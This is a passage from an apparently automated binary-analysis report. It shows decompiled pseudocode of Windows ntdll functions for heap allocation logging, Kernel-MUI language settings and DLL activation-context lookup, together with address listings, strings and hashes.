								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E00C84496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0xcb6360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0xcb6364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0xcb6366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E00BCB150();
								} else {
									E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E00C6D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E00BCB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E00BCB150();
								} else {
									E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E00BCB150("Just allocated block at %p for %Ix bytes\n",  *0xcb6360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0xcb6378 = 1;
									 *0xcb60c0 = 0;
									asm("int3");
									 *0xcb6378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0xcb5708; // 0x0
					 *0xcbb1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E00C1D130(0, _t177, _t181);
				}
			}





















                                                                                        0x00c82d82
                                                                                        0x00c82d84
                                                                                        0x00c82d89
                                                                                        0x00c82d8e
                                                                                        0x00c82d90
                                                                                        0x00c82d92
                                                                                        0x00c82d97
                                                                                        0x00c82d9a
                                                                                        0x00c82da4
                                                                                        0x00c82dc0
                                                                                        0x00c82dc3
                                                                                        0x00c82dd1
                                                                                        0x00c82dd6
                                                                                        0x00c82dd8
                                                                                        0x00c830a7
                                                                                        0x00c830a7
                                                                                        0x00c830aa
                                                                                        0x00c830aa
                                                                                        0x00c830ad
                                                                                        0x00c830b4
                                                                                        0x00000000
                                                                                        0x00c830b9
                                                                                        0x00c82de3
                                                                                        0x00c82de8
                                                                                        0x00c82deb
                                                                                        0x00c82dee
                                                                                        0x00c82df1
                                                                                        0x00c82df3
                                                                                        0x00c82dfb
                                                                                        0x00c82dfb
                                                                                        0x00c82df5
                                                                                        0x00c82df5
                                                                                        0x00c82df5
                                                                                        0x00c82e04
                                                                                        0x00c82e0a
                                                                                        0x00c82e0d
                                                                                        0x00c82e11
                                                                                        0x00c82e11
                                                                                        0x00c82e12
                                                                                        0x00c82e15
                                                                                        0x00c82e18
                                                                                        0x00c82e1a
                                                                                        0x00c83027
                                                                                        0x00c83027
                                                                                        0x00c8302d
                                                                                        0x00c83030
                                                                                        0x00c8304f
                                                                                        0x00c83054
                                                                                        0x00c83032
                                                                                        0x00c83047
                                                                                        0x00c8304c
                                                                                        0x00c8305a
                                                                                        0x00c83063
                                                                                        0x00000000
                                                                                        0x00c82e20
                                                                                        0x00c82e20
                                                                                        0x00c82e23
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c82e29
                                                                                        0x00c82e2b
                                                                                        0x00c82e47
                                                                                        0x00c82e2d
                                                                                        0x00c82e33
                                                                                        0x00c82e38
                                                                                        0x00c82e3f
                                                                                        0x00c82e42
                                                                                        0x00c82e42
                                                                                        0x00c82e4e
                                                                                        0x00c82e5d
                                                                                        0x00c82e5f
                                                                                        0x00c82e62
                                                                                        0x00c82e66
                                                                                        0x00c82e6b
                                                                                        0x00c82e6d
                                                                                        0x00000000
                                                                                        0x00c82e73
                                                                                        0x00c82e73
                                                                                        0x00c82e76
                                                                                        0x00c82e7a
                                                                                        0x00c82e83
                                                                                        0x00c82e83
                                                                                        0x00c82e83
                                                                                        0x00c82e85
                                                                                        0x00c82e87
                                                                                        0x00c82e8a
                                                                                        0x00c82e8d
                                                                                        0x00c82e92
                                                                                        0x00c82e9c
                                                                                        0x00c82e9f
                                                                                        0x00c82ea1
                                                                                        0x00c82ea2
                                                                                        0x00c82ea6
                                                                                        0x00c82ea6
                                                                                        0x00c82e9f
                                                                                        0x00c82eab
                                                                                        0x00c82eaf
                                                                                        0x00c82edf
                                                                                        0x00c82ee2
                                                                                        0x00c82ee5
                                                                                        0x00c82eb1
                                                                                        0x00c82eb3
                                                                                        0x00c82eb8
                                                                                        0x00c82ebd
                                                                                        0x00c82ec4
                                                                                        0x00c82ed6
                                                                                        0x00c82ec6
                                                                                        0x00c82ec7
                                                                                        0x00c82ecc
                                                                                        0x00c82ecf
                                                                                        0x00c82ed2
                                                                                        0x00c82ed2
                                                                                        0x00c82ed9
                                                                                        0x00c82ed9
                                                                                        0x00c82ee8
                                                                                        0x00c82eeb
                                                                                        0x00c82eef
                                                                                        0x00c82ef2
                                                                                        0x00c82efe
                                                                                        0x00c82f04
                                                                                        0x00c82f04
                                                                                        0x00c82f04
                                                                                        0x00c82f06
                                                                                        0x00c82f0d
                                                                                        0x00c82f0f
                                                                                        0x00c82f13
                                                                                        0x00c82f13
                                                                                        0x00c82f1b
                                                                                        0x00c82f21
                                                                                        0x00c82f27
                                                                                        0x00c82f95
                                                                                        0x00c82f98
                                                                                        0x00c82f9b
                                                                                        0x00c82fa0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c82fa6
                                                                                        0x00c82fa9
                                                                                        0x00c82fac
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c82fb2
                                                                                        0x00c82fb9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c82fc3
                                                                                        0x00c82fca
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c82fd0
                                                                                        0x00c82fd6
                                                                                        0x00c82fd9
                                                                                        0x00c82ff8
                                                                                        0x00c82ffd
                                                                                        0x00c82fdb
                                                                                        0x00c82ff0
                                                                                        0x00c82ff5
                                                                                        0x00c8300e
                                                                                        0x00c8300f
                                                                                        0x00c8301a
                                                                                        0x00000000
                                                                                        0x00c82f29
                                                                                        0x00c82f29
                                                                                        0x00c82f2c
                                                                                        0x00c82f4b
                                                                                        0x00c82f50
                                                                                        0x00c82f2e
                                                                                        0x00c82f43
                                                                                        0x00c82f48
                                                                                        0x00c82f56
                                                                                        0x00c82f64
                                                                                        0x00c82f6c
                                                                                        0x00c82f6c
                                                                                        0x00c82f72
                                                                                        0x00c82f76
                                                                                        0x00c82f7c
                                                                                        0x00c82f83
                                                                                        0x00c82f89
                                                                                        0x00c82f8a
                                                                                        0x00c82f8a
                                                                                        0x00000000
                                                                                        0x00c82f76
                                                                                        0x00c82f27
                                                                                        0x00c82e6d
                                                                                        0x00c82da6
                                                                                        0x00c82dab
                                                                                        0x00c82db3
                                                                                        0x00c82db9
                                                                                        0x00c830bc
                                                                                        0x00c830c1
                                                                                        0x00c830c1

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                        • API String ID: 0-1745908468
                                                                                        • Opcode ID: 3bb8f81d429eca007265106b72d35afb64b2a78e0d9951ac960932a1d9762fe4
                                                                                        • Instruction ID: 0f460a70df8f57de55e6525b008acacb80c4cab09fc3673d6c820410c6256f2e
                                                                                        • Opcode Fuzzy Hash: 3bb8f81d429eca007265106b72d35afb64b2a78e0d9951ac960932a1d9762fe4
                                                                                        • Instruction Fuzzy Hash: 389104316106809FCB22EFA8C455BADBBF2FF49718F18805DF4566B2A2C7359E41DB08
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BD3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 96%
                                                                                        			E00BD3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E00BD1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E00BD1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E00BD1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E00BD1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E00BD1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L00BE4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E00C0F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E00C11370(_t276, 0xba4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E00C0BB40(0,  &_v68, _t170);
									if(L00BD43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E00C0BB40(_t257,  &_v68, _t243);
								if(L00BD43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E00C11370(_t278, 0xba4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L00BE4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E00C0F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E00C11370(_v16, 0xba4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E00C0BB40(_t262,  &_v68, _t244);
								if(L00BD43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E00C11370(_t282, 0xba4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E00C0BB40(_t262,  &_v68, _t201);
							if(L00BD43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L00BE4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E00C0F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E00C11370(_t280, 0xba4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E00C0BB40(_t267,  &_v68, _t245);
							if(L00BD43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E00C11370(_t284, 0xba4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E00C0BB40(_t267,  &_v68, _t224);
						if(L00BD43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                        0x00bd3d3c
                                                                                        0x00bd3d42
                                                                                        0x00bd3d44
                                                                                        0x00bd3d46
                                                                                        0x00bd3d49
                                                                                        0x00bd3d4c
                                                                                        0x00bd3d4f
                                                                                        0x00bd3d52
                                                                                        0x00bd3d55
                                                                                        0x00bd3d58
                                                                                        0x00bd3d5b
                                                                                        0x00bd3d5f
                                                                                        0x00bd3d61
                                                                                        0x00bd3d66
                                                                                        0x00c28213
                                                                                        0x00c28218
                                                                                        0x00bd4085
                                                                                        0x00bd4088
                                                                                        0x00bd408e
                                                                                        0x00bd4094
                                                                                        0x00bd409a
                                                                                        0x00bd40a0
                                                                                        0x00bd40a6
                                                                                        0x00bd40a9
                                                                                        0x00bd40af
                                                                                        0x00bd40b6
                                                                                        0x00bd40bd
                                                                                        0x00bd40bd
                                                                                        0x00bd3d83
                                                                                        0x00c2821f
                                                                                        0x00c28229
                                                                                        0x00c28238
                                                                                        0x00c28238
                                                                                        0x00c2823d
                                                                                        0x00c2823d
                                                                                        0x00bd3da0
                                                                                        0x00bd3daf
                                                                                        0x00bd3db5
                                                                                        0x00bd3dba
                                                                                        0x00bd3dba
                                                                                        0x00bd3dd4
                                                                                        0x00bd3e94
                                                                                        0x00bd3eab
                                                                                        0x00bd3f6d
                                                                                        0x00bd3f84
                                                                                        0x00bd406b
                                                                                        0x00bd406b
                                                                                        0x00bd406e
                                                                                        0x00bd406e
                                                                                        0x00bd4070
                                                                                        0x00bd4074
                                                                                        0x00c28351
                                                                                        0x00c28351
                                                                                        0x00bd407a
                                                                                        0x00bd407f
                                                                                        0x00c2835d
                                                                                        0x00c28370
                                                                                        0x00c28377
                                                                                        0x00c28379
                                                                                        0x00c2837c
                                                                                        0x00c2837c
                                                                                        0x00c2835d
                                                                                        0x00000000
                                                                                        0x00bd407f
                                                                                        0x00bd3f8a
                                                                                        0x00bd3f8d
                                                                                        0x00bd3f90
                                                                                        0x00bd3f95
                                                                                        0x00c2830d
                                                                                        0x00c2830f
                                                                                        0x00bd3f9b
                                                                                        0x00bd3fac
                                                                                        0x00bd3fae
                                                                                        0x00bd3fb1
                                                                                        0x00bd3fb1
                                                                                        0x00bd3fb6
                                                                                        0x00c28317
                                                                                        0x00c2831a
                                                                                        0x00000000
                                                                                        0x00bd3fbc
                                                                                        0x00bd3fc1
                                                                                        0x00bd3fc9
                                                                                        0x00bd3fd7
                                                                                        0x00bd3fda
                                                                                        0x00bd3fdd
                                                                                        0x00bd4021
                                                                                        0x00bd4021
                                                                                        0x00bd4029
                                                                                        0x00bd4030
                                                                                        0x00bd4044
                                                                                        0x00bd4046
                                                                                        0x00bd4046
                                                                                        0x00bd4044
                                                                                        0x00bd4049
                                                                                        0x00c28327
                                                                                        0x00c28334
                                                                                        0x00c28339
                                                                                        0x00c2833c
                                                                                        0x00bd404f
                                                                                        0x00bd404f
                                                                                        0x00bd404f
                                                                                        0x00bd4051
                                                                                        0x00bd4056
                                                                                        0x00bd4063
                                                                                        0x00bd4063
                                                                                        0x00bd4068
                                                                                        0x00000000
                                                                                        0x00bd4068
                                                                                        0x00bd3fdf
                                                                                        0x00bd3fe2
                                                                                        0x00bd3fe4
                                                                                        0x00bd3fe7
                                                                                        0x00bd3fef
                                                                                        0x00bd4003
                                                                                        0x00bd4005
                                                                                        0x00bd4005
                                                                                        0x00bd400c
                                                                                        0x00bd4013
                                                                                        0x00bd4016
                                                                                        0x00bd4017
                                                                                        0x00bd401b
                                                                                        0x00bd401e
                                                                                        0x00000000
                                                                                        0x00bd401e
                                                                                        0x00bd3fb6
                                                                                        0x00bd3eb1
                                                                                        0x00bd3eb4
                                                                                        0x00bd3eb7
                                                                                        0x00bd3ebc
                                                                                        0x00c282a9
                                                                                        0x00c282ab
                                                                                        0x00bd3ec2
                                                                                        0x00bd3ed3
                                                                                        0x00bd3ed5
                                                                                        0x00bd3ed8
                                                                                        0x00bd3ed8
                                                                                        0x00bd3edd
                                                                                        0x00c282b3
                                                                                        0x00c282b6
                                                                                        0x00000000
                                                                                        0x00bd3ee3
                                                                                        0x00bd3ee8
                                                                                        0x00bd3eed
                                                                                        0x00bd3ef0
                                                                                        0x00bd3ef3
                                                                                        0x00bd3f02
                                                                                        0x00bd3f05
                                                                                        0x00bd3f08
                                                                                        0x00c282c0
                                                                                        0x00c282c3
                                                                                        0x00c282c5
                                                                                        0x00c282c8
                                                                                        0x00c282d0
                                                                                        0x00c282e4
                                                                                        0x00c282e6
                                                                                        0x00c282e6
                                                                                        0x00c282ed
                                                                                        0x00c282f4
                                                                                        0x00c282f7
                                                                                        0x00c282f8
                                                                                        0x00c282fc
                                                                                        0x00c282ff
                                                                                        0x00c282ff
                                                                                        0x00bd3f0e
                                                                                        0x00bd3f11
                                                                                        0x00bd3f16
                                                                                        0x00bd3f1d
                                                                                        0x00bd3f31
                                                                                        0x00c28307
                                                                                        0x00c28307
                                                                                        0x00bd3f31
                                                                                        0x00bd3f39
                                                                                        0x00bd3f48
                                                                                        0x00bd3f4d
                                                                                        0x00bd3f50
                                                                                        0x00bd3f50
                                                                                        0x00bd3f53
                                                                                        0x00bd3f58
                                                                                        0x00bd3f65
                                                                                        0x00bd3f65
                                                                                        0x00bd3f6a
                                                                                        0x00000000
                                                                                        0x00bd3f6a
                                                                                        0x00bd3edd
                                                                                        0x00bd3dda
                                                                                        0x00bd3ddd
                                                                                        0x00bd3de0
                                                                                        0x00bd3de5
                                                                                        0x00c28245
                                                                                        0x00bd3deb
                                                                                        0x00bd3df7
                                                                                        0x00bd3dfc
                                                                                        0x00bd3dfe
                                                                                        0x00bd3e01
                                                                                        0x00bd3e01
                                                                                        0x00bd3e06
                                                                                        0x00c2824d
                                                                                        0x00c2824f
                                                                                        0x00c28254
                                                                                        0x00000000
                                                                                        0x00bd3e0c
                                                                                        0x00bd3e11
                                                                                        0x00bd3e16
                                                                                        0x00bd3e19
                                                                                        0x00bd3e29
                                                                                        0x00bd3e2c
                                                                                        0x00bd3e2f
                                                                                        0x00c2825c
                                                                                        0x00c2825f
                                                                                        0x00c28261
                                                                                        0x00c28264
                                                                                        0x00c2826c
                                                                                        0x00c28280
                                                                                        0x00c28282
                                                                                        0x00c28282
                                                                                        0x00c28289
                                                                                        0x00c28290
                                                                                        0x00c28293
                                                                                        0x00c28294
                                                                                        0x00c28298
                                                                                        0x00c2829b
                                                                                        0x00c2829b
                                                                                        0x00bd3e35
                                                                                        0x00bd3e38
                                                                                        0x00bd3e3d
                                                                                        0x00bd3e44
                                                                                        0x00bd3e58
                                                                                        0x00c282a3
                                                                                        0x00c282a3
                                                                                        0x00bd3e58
                                                                                        0x00bd3e60
                                                                                        0x00bd3e6f
                                                                                        0x00bd3e74
                                                                                        0x00bd3e77
                                                                                        0x00bd3e77
                                                                                        0x00bd3e7a
                                                                                        0x00bd3e7f
                                                                                        0x00bd3e8c
                                                                                        0x00bd3e8c
                                                                                        0x00bd3e91
                                                                                        0x00000000
                                                                                        0x00bd3e91

                                                                                        Strings
                                                                                        • Kernel-MUI-Language-SKU, xrefs: 00BD3F70
                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 00BD3D8C
                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 00BD3E97
                                                                                        • WindowsExcludedProcs, xrefs: 00BD3D6F
                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 00BD3DC0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                        • API String ID: 0-258546922
                                                                                        • Opcode ID: f4a4f19325030ae775f5cc07744a39bb093c595961818d45a9d60141e79582e2
                                                                                        • Instruction ID: 88b3b4e3ec65ffe578bb33e23c152c976a0bdc45525f59c259f2548639beff67
                                                                                        • Opcode Fuzzy Hash: f4a4f19325030ae775f5cc07744a39bb093c595961818d45a9d60141e79582e2
                                                                                        • Instruction Fuzzy Hash: FCF14C72D01618EBCB15DF98D980AEEFBF9FF48750F1400AAE505A7651EB749E00DBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BF8E00, Relevance: 6.4, Strings: 5, Instructions: 126COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 44%
                                                                                        			E00BF8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0xcbd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0xcb8464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0xcb5780 & 0x00000003) != 0) {
							E00C45510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0xcb5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E00C0B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0xcb7984; // 0x762b48
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0xcb8464; // 0x74b10110
					 *0xcbb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E00BF9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0xcb5780 & 0x00000005) != 0) {
						_push(_t49);
						E00C45510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                                        0x00bf8e0f
                                                                                        0x00bf8e16
                                                                                        0x00bf8e19
                                                                                        0x00bf8e1b
                                                                                        0x00bf8e21
                                                                                        0x00bf8e7f
                                                                                        0x00bf8e85
                                                                                        0x00c39354
                                                                                        0x00c3936c
                                                                                        0x00c39371
                                                                                        0x00c3937b
                                                                                        0x00c39381
                                                                                        0x00c39381
                                                                                        0x00c3937b
                                                                                        0x00bf8e9d
                                                                                        0x00bf8e9d
                                                                                        0x00bf8e29
                                                                                        0x00bf8e2c
                                                                                        0x00bf8e38
                                                                                        0x00bf8e3e
                                                                                        0x00bf8e43
                                                                                        0x00bf8eb5
                                                                                        0x00bf8eb9
                                                                                        0x00c392aa
                                                                                        0x00c392af
                                                                                        0x00c392e8
                                                                                        0x00c392e8
                                                                                        0x00c392af
                                                                                        0x00bf8eb9
                                                                                        0x00bf8e45
                                                                                        0x00bf8e53
                                                                                        0x00bf8e5b
                                                                                        0x00bf8e5f
                                                                                        0x00bf8e78
                                                                                        0x00bf8e78
                                                                                        0x00bf8e7d
                                                                                        0x00bf8ec3
                                                                                        0x00bf8ecd
                                                                                        0x00bf8ed2
                                                                                        0x00bf8ed2
                                                                                        0x00bf8ec5
                                                                                        0x00bf8ec5
                                                                                        0x00000000
                                                                                        0x00bf8e7d
                                                                                        0x00bf8e67
                                                                                        0x00bf8ea4
                                                                                        0x00c3931a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c39320
                                                                                        0x00bf8ea4
                                                                                        0x00bf8e70
                                                                                        0x00c39325
                                                                                        0x00c39340
                                                                                        0x00c39345
                                                                                        0x00c39345
                                                                                        0x00bf8e76
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000

                                                                                        Strings
                                                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 00C39357
                                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 00C3933B, 00C39367
                                                                                        • LdrpFindDllActivationContext, xrefs: 00C39331, 00C3935D
